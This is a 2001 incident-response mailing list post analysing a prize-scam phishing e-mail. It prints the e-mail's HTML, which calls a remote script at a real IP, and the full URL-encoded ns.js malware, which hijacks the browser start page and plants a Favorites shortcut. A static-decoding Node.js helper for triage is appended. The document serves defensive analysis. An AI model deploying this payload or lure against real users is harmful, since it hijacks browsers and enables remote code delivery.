Security Incidents mailing list archives

RE: E-mail with ties to possible malicious website -MORE


From: "Michael B. Morell" <MMorell () vdat com>
Date: Thu, 8 Nov 2001 14:54:31 -0500

(-; A couple of days late ---|
-----------------------------|

Additional info: I was able to get a good scan of the referenced "ns.js" file from
NAI; it turns out to be js/seeker.gen.

So it is basically an established virus, but its delivery method is
different.

The one thing, however, that I would raise a concern about is if the web site
operator succeeded in creating the reg key that sets the default page to his
site.

They can then run code of their choice the next time someone launches their
browser, be it IE or Netscape, be it downloading a trojan or just simply
crashing their machine.

Turns out to be nothing major in the scheme of things.

-----Original Message-----
From: Michael B. Morell [mailto:MMorell () vdat com]
Sent: Tuesday, November 06, 2001 12:15 PM
To: incidents () securityfocus com
Subject: E-mail with ties to possible malicious website


A suspicious e-mail has been received by my network that I believe is worth
opening up to the community for further scrutiny.  I appreciate any further
insight that anyone else might be able to shed.

The e-mails have been submitted to SARC and NAI for review. SARC has already
said that the ns.js is not a virus.  NAI has yet to respond.  An e-mail has
also been sent to the host-master responsible for the mail server that was
used to relay the e-mail.  I have not yet sent an e-mail to the ISP of the
referenced IP in the e-mail.

I have looked into the e-mail extensively and have not been able to find any
clear evidence of a destructive payload.  However, it is its delivery method
and what it appears to try to do that is cause for my concern.

The e-mail itself is HTML based and relies on social engineering to coerce
the end user into proceeding.

<!--Begin HTML-->
<html>
<head>
<title>Prize Collection</title>

</head>

<body bgcolor="#FFFFFF" text="#000000" onload=init();>
<p>Dear Sir/Madam.</p>
<p>I am contacting you on behalf of the &quot;Online Bank Draw&quot;
corporation.<br>
  A prize won by you on the 16th of August 2001 (by e-mail submission) is
ready 
  to be collected.<br>
  <br>
  Please <a href="http://64.57.164.73/agus2000/ns/"; target="_blank">read
this page 
  for further information</a>.</p>
<p><br>
  Yours Sincerely.<br>
  Mike Ranson.<br>
  USCT Internet Postal Delivery.<br>
  <script language="JScript.Encode"
src="http://64.57.164.73/agus2000/ns.js";></script>
</p>
</body>
</html>

<!--End HTML-->

You will notice some telltale signs that this is a fraudulent e-mail.
1. The lack of a subject
2. A claim of prize money
3. An odd name for a company, "Online Bank Draw"
4. Signed by the USCT Internet Postal Delivery (never heard of them)

A further investigation into the headers will also reveal that the sender
does not have a valid e-mail address, nor can you trace its footprint back.

<!--Begin Headers, obvious substitutions of names and IPs until relayed
mail server hostmaster confirms authorized use of server-->

Received: from ADomain.com (mail.ADomain.com [xxx.xxx.xxx.xxx]) by
mail.OurDomain.com with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.2653.13)
        id V93AVXYX; Mon, 5 Nov 2001 18:36:34 -0500
Received: from mail.ADomain.com [xxx.xxx.xxx.xxx] by ADomain.com with ESMTP
  (SMTPD32-6.06) id A27E9B6019E; Mon, 05 Nov 2001 18:36:30 -0500
From: Mike Ranson - USCT Internet Postal Delivery
Date: Tue, 06 Nov 2001 07:34:13
To: ReplacedUserNameHere
Subject: 
MIME-Version: 1.0
Content-Type: multipart/related;
  boundary="----=_NextPart_FPJUZAJHEK"
Content-Transfer-Encoding: 7bit
Message-ID: PM20007:34:13 AM

This is an HTML email message.  If you see this, your mail client does not
support HTML messages.

------=_NextPart_FPJUZAJHEK
Content-Type: text/html;charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

------=_NextPart_FPJUZAJHEK-- 

<!--End Headers-->

Once a user clicks on the link in the e-mail, their screen is flooded with
opened windows that go to adult websites (aka porn).  It was unclear whether
or not this was to hide further action of the script or if that was the
intended payload.

After some searching on the infected system, I was unable to find any
obvious system file changes/additions.
But I was able to find the ns.js file that was referenced in the source.
This was found in the Temporary Internet Files folder.

By reading the script file I noticed several things (granted, I am not the
best at JavaScripting, which is why I am submitting it here).  From what I
can tell, it checks to see if the CLSIDs for Netscape/IE/WSH exist and, if they
do, attempts to write a reg key for the current user.

The path it calls is based on the Win2k users path.

<!--Begin ns.js opened in notepad-->

<!--
document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%0D%0A%09
document.write%28%22%3CAPPLET%20HEIGHT%3D0%20WIDTH%3D0%20code%3Dcom.ms.activ
eX.ActiveXComponent%3E%3C/APPLET%3E%22%29%3B%0D%0A%0D%0A%09if%20%28navigator
.appName%20%3D%3D%20%27Netscape%27%29%20var%20language%20%3D%20navigator.lan
guage%3B%0D%0A%09else%20var%20language%20%3D%20navigator.browserLanguage%3B%
0D%0A%0D%0A%09function%20AddFavLnk%28loc%2C%20DispName%2C%20SiteURL%29%20%7B
%0D%0A%09%20%20var%20Shor%20%3D%20Shl.CreateShortcut%28loc%20+%20%22%5C%5C%2
2%20+%20DispName%20+%22.URL%22%29%3B%0D%0A%09%20%20Shor.TargetPath%20%3D%20S
iteURL%3B%0D%0A%09%20%20Shor.Save%28%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09functio
n%20f%28%29%20%7B%0D%0A%09%20%20try%20%7B%0D%0A%20%20%20%20%20%20a1%3Ddocume
nt.applets%5B0%5D%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28%22%7BF935DC22-1CF
0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%20a1.createInstanc
e%28%29%3B%0D%0A%20%20%20%20%20%20Shl%20%3D%20a1.GetObject%28%29%3B%0D%0A%20
%20%20%20%20%20a1.setCLSID%28%22%7B0D43FE01-F093-11CF-8940-00A0C9054228%7D%2
2%29%3B%0D%0A%20%20%20%20%20%20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%
20%20FSO%20%3D%20a1.GetObject%28%29%3B%0D%0A%20%20%20%20%20%20a1.setCLSID%28
%22%7BF935DC26-1CF0-11D0-ADB9-00C04FD58A0B%7D%22%29%3B%0D%0A%20%20%20%20%20%
20a1.createInstance%28%29%3B%0D%0A%20%20%20%20%20%20Net%20%3D%20a1.GetObject
%28%29%3B%0D%0A%20%20%20%20%20%20try%20%7B%0D%0A//%20%20%20%20%20%20%20%20if
%20%28document.cookie.indexOf%28%22Chg%22%29%20%3D%3D%20-1%29%20%7B%0D%0A//%
20%20%20%20%20%20%20%20%20%20var%20expdate%20%3D%20new%20Date%28%28new%20Dat
e%28%29%29.getTime%28%29%20+%20%2824%20*%2060%20*%2060%20*%201000%20*%2090%2
9%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%20document.cookie%3D%22Chg%3Dgene
ral%3B%20expires%3D%22%20+%20expdate.toGMTString%28%29%20+%20%22%3B%20path%3
D/%3B%22%0D%0A%20%20%20%20%20%20%20%20%20%20if%20%28%21language.indexOf%28%2
7es%27%29%20%3E-1%29%20Shl.RegWrite%20%28%22HKCU%5C%5CSoftware%5C%5CMicrosof
t%5C%5CInternet%20Explorer%5C%5CMain%5C%5CStart%20Page%22%2C%20%22http%3A//6
4.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20%20%20%20%20%20%20%20%20%2
0var%20expdate%20%3D%20new%20Date%28%28new%20Date%28%29%29.getTime%28%29%20+
%20%2824%20*%2060%20*%2060%20*%201000%20*%2090%29%29%3B%0D%0A//%20%20%20%20%
20%20%20%20%20%20document.cookie%3D%22Chg%3Dgeneral%3B%20expires%3D%22%20+%2
0expdate.toGMTString%28%29%20+%20%22%3B%20path%3D/%3B%22%0D%0A%20%20%20%20%2
0%20%20%20%20%20var%20WF%2C%20Shor%2C%20loc%3B%0D%0A%20%20%20%20%20%20%20%20
%20%20WF%20%3D%20FSO.GetSpecialFolder%280%29%3B%0D%0A%20%20%20%20%20%20%20%2
0%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc%20%3D%20WF%20
+%20%22%5C%5Cfavoritos%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20
%28language.indexOf%28%27de%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5
Cfavoriten%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.
indexOf%28%27sv%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoriter%2
2%3B%0D%0A%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%2
7it%27%29%20%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cpreferiti%22%3B%0D%0A%2
0%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27fr%27%29%20
%3E-1%29%20loc%20%3D%20WF%20+%20%22%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%
20%20%20%20%20else%20if%20%28language.indexOf%28%27da%27%29%20%3E-1%29%20loc
%20%3D%20WF%20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%2
0else%20loc%20%3D%20WF%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%20%20%20%2
0%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0A%20%20%20%20%20
%20%20%20%20%20%20%20if%20%28language.indexOf%28%27es%27%29%20%3E-1%29%20loc
%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%
5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavoritos%22%3B%0D%0A%20%20%20%20
%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27de%27%29%20%3E-
1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%2
0Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriten%22%3B%0D%0A%2
0%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%28%27sv%27
%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocumen
ts%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cfavoriter%22%
3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28language.indexOf%
28%27it%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C
%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5Cpre
feriti%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%28languag
e.indexOf%28%27fr%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28WF%29%20
+%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%20+%20%2
2%5C%5Cfavoris%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%20if%20%2
8language.indexOf%28%27da%27%29%20%3E-1%29%20loc%20%3D%20FSO.GetDriveName%28
WF%29%20+%20%22%5C%5CDocuments%20and%20Settings%5C%5C%22%20+%20Net.UserName%
20+%20%22%5C%5Coversigt%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20else%
20loc%20%3D%20FSO.GetDriveName%28WF%29%20+%20%22%5C%5CDocuments%20and%20Sett
ings%5C%5C%22%20+%20Net.UserName%20+%20%22%5C%5CFavorites%22%3B%0D%0A%20%20%
20%20%20%20%20%20%20%20%20%20if%28%21FSO.FolderExists%28loc%29%29%20%7B%0D%0
A%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0D%0A%20%20%20%20%20%20
%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%
20%20%20%20%20%20%20AddFavLnk%28loc%2C%20%22START
HERE%22%2C%20%22http%3A//64.57.164.73/agus2000/jstarter/%22%29%3B%0D%0A//%20
%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20c
atch%28e%29%20%7B%7D%0D%0A%09%20%20%7D%0D%0A%09%20%20catch%28e%29%20%7B%7D%0
D%0A%09%7D%0D%0A%0D%0A%09function%20init%28%29%20%7B%0D%0A%09%20%20setTimeou
t%28%22f%28%29%22%2C%201000%29%3B%0D%0A%09%7D%0D%0A%0D%0A%09init%28%29%3B%0D
%0A%3C/script%3E%0D%0A"));
//-->

<!--End ns.js-->

One of my main reasons for concern is that if it is able to get the start
page for the browser changed to a malicious location, it would then be
possible upon start-up of the browser for the malicious website operator to
download code of his/her choice to the system.

The attempt is to write a reg key in
HKCU\Software\Microsoft\InternetExplorer\MainStartPage and to set it to 
http//64.57.164.73/agus2000/jstarter

Another concern is the reference to FSO.GetDriveName.  I am unsure if it
is referencing the File System Object for any drive mappings that the system
has present.  If this can be confirmed/dismissed it would be helpful.   Plus
the mention of setting a cookie on the system and its setting an expiration
date.

Thanks in advance for looking at this.

Michael B. Morell
Network Operations Administrator
Visual Data Corporation
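Added example, not from the original post or the list: a small Node.js triage helper for the document.write(unescape("...")) obfuscation the posted ns.js uses. It decodes the %XX layer and reports which WSH objects are instantiated via setCLSID, which registry values RegWrite targets, and which URLs and Favorites shortcuts appear, without executing anything. The sample input is constructed in the same style with a placeholder host; the CLSID-to-object names are the standard Windows Script Host CLSIDs found in the posted script.

```javascript
// Static triage for scripts hidden behind document.write(unescape("...")).
// Nothing here executes the script; it only decodes and pattern-matches.
// CLSIDs that appear in the posted ns.js, mapped to the WSH objects they name.
const KNOWN_CLSIDS = {
  "{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Shell",
  "{0D43FE01-F093-11CF-8940-00A0C9054228}": "Scripting.FileSystemObject",
  "{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}": "WScript.Network",
};
const STR = '"((?:[^"\\\\]|\\\\.)*)"'; // regex source for a "..." JScript literal

// Decode every unescape("...") argument. The blob uses %XX sequences only,
// so decodeURIComponent gives the same result as the legacy unescape here.
function decodeUnescapeLayers(src) {
  const re = new RegExp("unescape\\(\\s*" + STR + "\\s*\\)", "g");
  return Array.from(src.matchAll(re), (m) => decodeURIComponent(m[1]));
}

// Resolve backslash escapes in a literal body (\\ -> \, \" -> ").
const unquote = (lit) => lit.replace(/\\(.)/g, "$1");

// Report the indicators found in one decoded layer.
function triage(decoded) {
  const clsidRe = new RegExp("setCLSID\\s*\\(\\s*" + STR, "g");
  const regRe = new RegExp("RegWrite\\s*\\(\\s*" + STR + "\\s*,\\s*" + STR, "g");
  return {
    objects: Array.from(decoded.matchAll(clsidRe), (m) => {
      const clsid = unquote(m[1]).toUpperCase();
      return KNOWN_CLSIDS[clsid] || "unknown " + clsid;
    }),
    regWrites: Array.from(decoded.matchAll(regRe),
      (m) => ({ key: unquote(m[1]), value: unquote(m[2]) })),
    urls: [...new Set(decoded.match(/https?:\/\/[^\s"'<>)]+/g) || [])],
    writesFavoritesShortcut: /CreateShortcut\s*\(.*\.URL"/.test(decoded),
  };
}

function analyzeScript(src) {
  return decodeUnescapeLayers(src).map(triage);
}

// CONSTRUCTED sample in the style of the posted ns.js; the host is a placeholder.
// encodeURIComponent just builds the %XX layer that the real file ships pre-encoded.
const SAMPLE = 'document.write(unescape("' + encodeURIComponent(
  'a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); Shl = a1.GetObject();\r\n' +
  'Shl.RegWrite ("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page", ' +
  '"http://placeholder.invalid/jstarter/");\r\n' +
  'var Shor = Shl.CreateShortcut(loc + "\\\\START HERE.URL"); Shor.Save();'
) + '"));';
console.log(JSON.stringify(analyzeScript(SAMPLE), null, 2));
```

Run against the real file, the same decoder exposes the Start Page write and the "START HERE" Favorites shortcut that the post describes, which are the two indicators worth checking on the affected workstation.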

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
